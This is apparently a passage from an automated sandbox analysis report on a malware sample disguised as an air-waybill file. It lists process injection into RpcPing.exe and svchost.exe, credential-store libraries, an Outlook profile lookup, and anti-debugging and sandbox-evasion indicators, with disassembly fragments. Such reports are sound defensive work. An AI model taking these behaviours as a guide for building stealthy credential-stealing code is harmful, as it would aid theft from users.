            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: AWB NO. 077-57676135055.exeStatic file information: File size 1182720 > 1048576
            Source: AWB NO. 077-57676135055.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: AWB NO. 077-57676135055.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: AWB NO. 077-57676135055.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: AWB NO. 077-57676135055.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: AWB NO. 077-57676135055.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: AWB NO. 077-57676135055.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: AWB NO. 077-57676135055.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: jFlHFdZgIYNZqR.exe, 00000003.00000000.18449708265.000000000051E000.00000002.00000001.01000000.00000004.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23184750264.000000000051E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: AWB NO. 077-57676135055.exe, 00000000.00000003.18131573643.0000000003FB0000.00000004.00001000.00020000.00000000.sdmp, AWB NO. 077-57676135055.exe, 00000000.00000003.18129996314.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.18533534284.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.18369078674.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.18533534284.000000000302D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.18362303524.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000002.23186772776.000000000343D000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000002.23186772776.0000000003310000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000003.18532753430.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000003.18540137751.0000000003163000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: RPCPing.pdbGCTL source: svchost.exe, 00000002.00000003.18500957971.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.18501031361.000000000082B000.00000004.00000020.00020000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000003.00000003.22066027832.0000000000B9B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: AWB NO. 077-57676135055.exe, 00000000.00000003.18131573643.0000000003FB0000.00000004.00001000.00020000.00000000.sdmp, AWB NO. 077-57676135055.exe, 00000000.00000003.18129996314.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.18533534284.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.18369078674.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.18533534284.000000000302D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.18362303524.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000002.23186772776.000000000343D000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000002.23186772776.0000000003310000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000003.18532753430.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000003.18540137751.0000000003163000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: RPCPing.pdb source: svchost.exe, 00000002.00000003.18500957971.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.18501031361.000000000082B000.00000004.00000020.00020000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000003.00000003.22066027832.0000000000B9B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: RpcPing.exe, 00000004.00000002.23187811443.000000000393C000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000004.00000002.23185093416.0000000002DD2000.00000004.00000020.00020000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000000.18680544916.0000000002D7C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.19004125183.000000003A15C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: RpcPing.exe, 00000004.00000002.23187811443.000000000393C000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000004.00000002.23185093416.0000000002DD2000.00000004.00000020.00020000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000000.18680544916.0000000002D7C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.19004125183.000000003A15C000.00000004.80000000.00040000.00000000.sdmp
            Source: AWB NO. 077-57676135055.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: AWB NO. 077-57676135055.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: AWB NO. 077-57676135055.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: AWB NO. 077-57676135055.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: AWB NO. 077-57676135055.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_0047C304 LoadLibraryA,GetProcAddress,0_2_0047C304
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_00428B85 push ecx; ret 0_2_00428B98
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004190A0 push esp; ret 2_2_004190B5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00408926 push ebx; iretd 2_2_0040892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D99B pushad ; ret 2_2_0040D99C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041EB96 push FFFFFF8Fh; retf 2_2_0041EB9A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411CAC pushfd ; retf 2_2_00411CB8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411CBF push 3E557F42h; ret 2_2_00411CC4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403570 push eax; ret 2_2_00403572
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004075A7 push 67C9EEB0h; retf 2_2_004075B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F308CD push ecx; mov dword ptr [esp], ecx2_2_02F308D6
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_00404A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00404A35
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_004855FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_004855FD
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_004233C7 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004233C7
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeAPI/Special instruction interceptor: Address: 1033234
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FFF02D0D144
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FFF02D0D604
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FFF02D0D764
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FFF02D0D324
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FFF02D0D364
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FFF02D0D004
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FFF02D0FF74
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FFF02D0D864
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F71763 rdtsc 2_2_02F71763
            Source: C:\Windows\SysWOW64\RpcPing.exeWindow / User API: threadDelayed 9113Jump to behavior
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-98907
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeAPI coverage: 4.7 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.9 %
            Source: C:\Windows\SysWOW64\RpcPing.exe TID: 8096Thread sleep count: 115 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exe TID: 8096Thread sleep time: -230000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exe TID: 8096Thread sleep count: 9113 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exe TID: 8096Thread sleep time: -18226000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe TID: 504Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\RpcPing.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_00464696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00464696
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_0046C93C FindFirstFileW,FindClose,0_2_0046C93C
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_0046C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,0_2_0046C9C7
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_0046F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046F200
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_0046F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046F35D
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_0046F65E FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_0046F65E
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_00463A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00463A2B
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_00463D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00463D4E
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_0046BF27 FindFirstFileW,FindNextFileW,FindClose,0_2_0046BF27
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_00404AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00404AFE
            Source: firefox.exe, 00000006.00000002.19005813498.0000016E3A017000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1
            Source: RpcPing.exe, 00000004.00000002.23185093416.0000000002DD2000.00000004.00000020.00020000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23185419592.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeAPI call chain: ExitProcess graph end nodegraph_0-98308
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeAPI call chain: ExitProcess graph end nodegraph_0-97879
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F71763 rdtsc 2_2_02F71763
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417CC3 LdrLoadDll,2_2_00417CC3
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_004741FD BlockInput,0_2_004741FD
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_00403B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00403B4C
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_00435CCC EncodePointer,EncodePointer,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00435CCC
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_0047C304 LoadLibraryA,GetProcAddress,0_2_0047C304
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_01033500 mov eax, dword ptr fs:[00000030h]0_2_01033500
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_010334A0 mov eax, dword ptr fs:[00000030h]0_2_010334A0
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_01031E70 mov eax, dword ptr fs:[00000030h]0_2_01031E70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F402F9 mov eax, dword ptr fs:[00000030h]2_2_02F402F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F402F9 mov eax, dword ptr fs:[00000030h]2_2_02F402F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F402F9 mov eax, dword ptr fs:[00000030h]2_2_02F402F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F402F9 mov eax, dword ptr fs:[00000030h]2_2_02F402F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F402F9 mov eax, dword ptr fs:[00000030h]2_2_02F402F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F402F9 mov eax, dword ptr fs:[00000030h]2_2_02F402F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F402F9 mov eax, dword ptr fs:[00000030h]2_2_02F402F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F402F9 mov eax, dword ptr fs:[00000030h]2_2_02F402F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F272E0 mov eax, dword ptr fs:[00000030h]2_2_02F272E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A2E0 mov eax, dword ptr fs:[00000030h]2_2_02F3A2E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A2E0 mov eax, dword ptr fs:[00000030h]2_2_02F3A2E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A2E0 mov eax, dword ptr fs:[00000030h]2_2_02F3A2E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A2E0 mov eax, dword ptr fs:[00000030h]2_2_02F3A2E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A2E0 mov eax, dword ptr fs:[00000030h]2_2_02F3A2E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A2E0 mov eax, dword ptr fs:[00000030h]2_2_02F3A2E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F382E0 mov eax, dword ptr fs:[00000030h]2_2_02F382E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F382E0 mov eax, dword ptr fs:[00000030h]2_2_02F382E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F382E0 mov eax, dword ptr fs:[00000030h]2_2_02F382E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F382E0 mov eax, dword ptr fs:[00000030h]2_2_02F382E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2D2EC mov eax, dword ptr fs:[00000030h]2_2_02F2D2EC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2D2EC mov eax, dword ptr fs:[00000030h]2_2_02F2D2EC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F532C5 mov eax, dword ptr fs:[00000030h]2_2_02F532C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03003336 mov eax, dword ptr fs:[00000030h]2_2_03003336
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F632C0 mov eax, dword ptr fs:[00000030h]2_2_02F632C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F632C0 mov eax, dword ptr fs:[00000030h]2_2_02F632C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C2B0 mov ecx, dword ptr fs:[00000030h]2_2_02F2C2B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEF2AE mov eax, dword ptr fs:[00000030h]2_2_02FEF2AE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF92AB mov eax, dword ptr fs:[00000030h]2_2_02FF92AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F542AF mov eax, dword ptr fs:[00000030h]2_2_02F542AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F542AF mov eax, dword ptr fs:[00000030h]2_2_02F542AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F292AF mov eax, dword ptr fs:[00000030h]2_2_02F292AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F37290 mov eax, dword ptr fs:[00000030h]2_2_02F37290
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F37290 mov eax, dword ptr fs:[00000030h]2_2_02F37290
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F37290 mov eax, dword ptr fs:[00000030h]2_2_02F37290
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE289 mov eax, dword ptr fs:[00000030h]2_2_02FAE289
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2B273 mov eax, dword ptr fs:[00000030h]2_2_02F2B273
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2B273 mov eax, dword ptr fs:[00000030h]2_2_02F2B273
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2B273 mov eax, dword ptr fs:[00000030h]2_2_02F2B273
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC327E mov eax, dword ptr fs:[00000030h]2_2_02FC327E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC327E mov eax, dword ptr fs:[00000030h]2_2_02FC327E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC327E mov eax, dword ptr fs:[00000030h]2_2_02FC327E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC327E mov eax, dword ptr fs:[00000030h]2_2_02FC327E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC327E mov eax, dword ptr fs:[00000030h]2_2_02FC327E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC327E mov eax, dword ptr fs:[00000030h]2_2_02FC327E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FED270 mov eax, dword ptr fs:[00000030h]2_2_02FED270
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF124C mov eax, dword ptr fs:[00000030h]2_2_02FF124C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF124C mov eax, dword ptr fs:[00000030h]2_2_02FF124C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF124C mov eax, dword ptr fs:[00000030h]2_2_02FF124C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF124C mov eax, dword ptr fs:[00000030h]2_2_02FF124C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEF247 mov eax, dword ptr fs:[00000030h]2_2_02FEF247
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5F24A mov eax, dword ptr fs:[00000030h]2_2_02F5F24A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F50230 mov ecx, dword ptr fs:[00000030h]2_2_02F50230
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB0227 mov eax, dword ptr fs:[00000030h]2_2_02FB0227
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB0227 mov eax, dword ptr fs:[00000030h]2_2_02FB0227
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB0227 mov eax, dword ptr fs:[00000030h]2_2_02FB0227
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A22B mov eax, dword ptr fs:[00000030h]2_2_02F6A22B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A22B mov eax, dword ptr fs:[00000030h]2_2_02F6A22B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A22B mov eax, dword ptr fs:[00000030h]2_2_02F6A22B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2821B mov eax, dword ptr fs:[00000030h]2_2_02F2821B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBB214 mov eax, dword ptr fs:[00000030h]2_2_02FBB214
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBB214 mov eax, dword ptr fs:[00000030h]2_2_02FBB214
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A200 mov eax, dword ptr fs:[00000030h]2_2_02F2A200
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F633D0 mov eax, dword ptr fs:[00000030h]2_2_02F633D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F643D0 mov ecx, dword ptr fs:[00000030h]2_2_02F643D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB43D5 mov eax, dword ptr fs:[00000030h]2_2_02FB43D5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E3C0 mov eax, dword ptr fs:[00000030h]2_2_02F2E3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E3C0 mov eax, dword ptr fs:[00000030h]2_2_02F2E3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E3C0 mov eax, dword ptr fs:[00000030h]2_2_02F2E3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C3C7 mov eax, dword ptr fs:[00000030h]2_2_02F2C3C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F363CB mov eax, dword ptr fs:[00000030h]2_2_02F363CB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAC3B0 mov eax, dword ptr fs:[00000030h]2_2_02FAC3B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F393A6 mov eax, dword ptr fs:[00000030h]2_2_02F393A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F393A6 mov eax, dword ptr fs:[00000030h]2_2_02F393A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5A390 mov eax, dword ptr fs:[00000030h]2_2_02F5A390
